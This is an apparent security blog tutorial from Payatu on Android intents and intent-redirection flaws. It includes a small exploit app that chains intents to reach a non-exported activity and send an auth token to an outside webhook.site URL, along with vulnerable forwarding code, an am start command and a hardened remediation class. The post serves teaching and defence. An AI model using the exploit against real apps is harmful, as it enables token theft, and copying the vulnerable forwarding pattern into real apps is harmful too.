Penetrate the Protected Component in Android
Introduction
Hello guys, in the last blog of this series we discussed the basic fundamentals of Android applications and their architecture. If you have not read my previous blog on Understanding Android Basics, you can read it here.
This blog series aims to help you understand how Android application components work and how an attacker can access or steal an application's internal data even when its components are secured.
Prerequisites
Before starting this blog series, it is assumed that the reader has prior knowledge of Java and Android basics; this will help in understanding how the components work and how they are exploited.
Before looking at the exploitation phase, let us first understand what an intent is, how it works and how it is used.
INTENT
An intent is a message that can be thought of as a request and is given to either an activity within your own app, an external application, or a built-in Android service.
An Intent is a messaging object you can use to request an action from another app component. Although intents facilitate communication between components in several ways, think of an intent as a way for an activity to communicate with the outside Android world. A few key tasks that an intent might be used for within your app:
- Take the user to another screen (activity) within your application
- Take the user to a particular URL within the Android web browser
- Take the user to the camera to have them take a picture
- Initiate a call for the user to a given number
Three fundamental use cases
Starting an activity
An Activity represents a single screen. You can launch another activity by passing an Intent to startActivity(intent). If you want to receive a result from the activity when it finishes, call startActivityForResult() instead; your activity receives the result as a separate Intent object in its onActivityResult() callback.
Starting a service
A Service is a component that performs operations in the background without a user interface. You can start a service to perform a one-time operation (such as downloading a file) by passing an Intent to startService(), or bind to the service from another component by passing an Intent to bindService().
Delivering a broadcast
A broadcast is a message that any app can receive. The system delivers various broadcasts for system events, such as when the system boots up or the device starts charging. You can deliver a broadcast to other apps by passing an Intent to sendBroadcast() or sendOrderedBroadcast().

Intent Filter
An intent filter specifies the types of intents that an activity, service, or broadcast receiver can respond to. It declares the capabilities of its parent component: what an activity or service can do and what types of broadcasts a receiver can handle. It opens the component to receiving intents of the advertised type. Matching is mostly done on the <action>, <category> and <data> elements of the filter.
Intents are of two types:
- Explicit Intent
- Implicit Intent
Explicit Intent
An explicit intent names the component it targets, such as a particular activity or service in your app. You will typically use an explicit intent to start a component in your own app, because you know the class name of the activity or service you want to start.
When the intent object names a specific activity component explicitly, the system immediately starts that component.
For example:
public void callSecondActivity(View view) {
    Intent i = new Intent(getApplicationContext(), SecondActivity.class);
    i.putExtra("Value1", "Android By Javatpoint");
    i.putExtra("Value2", "Simple Tutorial");
    startActivity(i);
}
Implicit Intent
Implicit intents are those in which no component is specified. Android determines an appropriate component to handle the intent.
We send an intent message, and the Android operating system checks which components are registered for it and decides which one should receive the intent; that component can be outside the sender's application.
Example:
Intent intent = getIntent();
intent.setAction("com.example.intent_vuln1");
// The embedded intent is read from the "hello" extra and forwarded as-is.
Intent extraIntent = (Intent) intent.getParcelableExtra("hello");
if (extraIntent != null) {
    startActivity(extraIntent);
}
Intent-Redirection
Intent redirection involves an embedded intent, which may be implicit or explicit, that is used to move from one Android component to another.
Embedding intents in other intents allows developers to create proxy components: components that take the bundled intent and pass it to a method like startActivity()
to launch another component in the app.
This vulnerability occurs when the developer forwards the embedded intent without filtering or validating it. It is similar to an open redirect in web security. This is risky because an attacker can force the app to launch a non-exported component that cannot be launched directly from another app, or grant the attacker access to the app's content providers.
CASE 1: Intent Redirection in an Explicit Intent
Let us examine an example. Below is a fragment of the AndroidManifest.xml file.
The application has two activities, MainActivity and MainActivity2; MainActivity is exported by default and MainActivity2 has exported set to false.

The export restriction means the attacker cannot access MainActivity2 directly. A direct call throws a java.lang.SecurityException with Permission Denial: MainActivity2 not exported from uid .

Let's examine the code further: MainActivity

After seeing the above picture, it is clear that an attacker can launch MainActivity2 by passing an "id" extra in the intent:
am start -n com.example.intent_vuln/.MainActivity --es "id" "123"

CASE 2: Intent Redirection by Implicit Intent
Let's understand this with a practical demonstration:
AndroidManifest.xml
We have two activities: WebActivity with exported set to true and MainActivity3 with exported set to false.

Look at the Java code in WebActivity.java

Let's look at it step by step as shown in the picture above.
- Setting the intent action
- Getting the object data with the name "hello"; because the class `Intent` is `Parcelable`, objects of this class can be passed as extra data in another `Intent`
- Starting the activity with the object passed through it
Let’s Access!!!

- Creating an extra Intent object
- Setting its class name to the non-exported activity MainActivity3
- Putting an extra with the key "url"
- Creating another Intent object named intent
- Setting its class name to the exported activity WebActivity
- Putting the extra object created above into it
- Starting the activity with that object
- On running exploit.apk, it launches the protected activity MainActivity3.
Use Case: Auth Token Leakage

Let's take a real-world example with a use case: auth token leakage.
Let's examine the vulnerable application code.
AndroidManifest.xml

.Implicit_redirection

Going over the implicit intent redirection, it is clear from the above picture that any third-party application can send a Parcelable Intent with the name "extra_intent".
.Protected_A

The application simply extracts the "url" extra and loads that URL in a WebView along with the token.
Exploit Application
Intent intent = new Intent();
intent.setClassName("com.example.intent_intro","com.example.intent_intro.Protected_A");
intent.putExtra("url","https://webhook.site/c3dd45e7-bea0-48ad-bcd5-1419f090dbd2");
Intent extra = new Intent();
extra.setClassName("com.example.intent_intro","com.example.intent_intro.Implicit_redirection");
extra.putExtra("extra_intent",intent);
startActivity(extra);
Remediation
- If the affected app component does not need to receive intents from other apps, then you can make that app component private by setting android:exported="false" in your manifest.
- Ensure that the extracted Intent is from a trustworthy source
- Ensure that the to-be-redirected Intent is not harmful
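As an added example (not code from the original post or the vulnerable app), here is a hardened version of the proxy activity from the use case above, implementing the last two remediation points. The class name Implicit_redirection, the package com.example.intent_intro and the extra key "extra_intent" come from the post; the helper isSafeToForward and the log tag are assumptions.

```java
package com.example.intent_intro;

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.content.pm.ActivityInfo;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;

public class Implicit_redirection extends Activity {
    private static final String TAG = "IntentRedirect"; // assumed tag

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent forwarded = getIntent().getParcelableExtra("extra_intent");
        if (forwarded != null && isSafeToForward(forwarded)) {
            startActivity(forwarded);
        } else {
            Log.w(TAG, "Dropped embedded intent that failed validation");
        }
        finish();
    }

    // Forward only to destinations the caller could already start directly.
    private boolean isSafeToForward(Intent forwarded) {
        // Strip URI permission grants: forwarding them would hand the caller
        // access to our content providers that it never had itself.
        forwarded.removeFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
                | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
                | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION);
        // Resolve where the intent would actually land (explicit or implicit).
        ComponentName target = forwarded.resolveActivity(getPackageManager());
        if (target == null) return false;
        // A target inside our own package must be exported; otherwise the caller
        // is using us to reach a component (such as Protected_A) that the
        // system would refuse to start for it directly.
        if (getPackageName().equals(target.getPackageName())) {
            try {
                ActivityInfo info = getPackageManager().getActivityInfo(target, 0);
                return info.exported;
            } catch (PackageManager.NameNotFoundException e) {
                return false;
            }
        }
        return true;
    }
}
```

When the proxy is only ever started with startActivityForResult(), getCallingActivity() can additionally be checked against an allow-list to cover the "trustworthy source" point.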
In this way we can intercept the intent and also access the protected component. We will learn more about this in the next blog.
About Payatu
Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting company specializing in security assessments of IoT product ecosystem, Web application & Network with a proven track record of securing applications and infrastructure for customers across 20+ countries.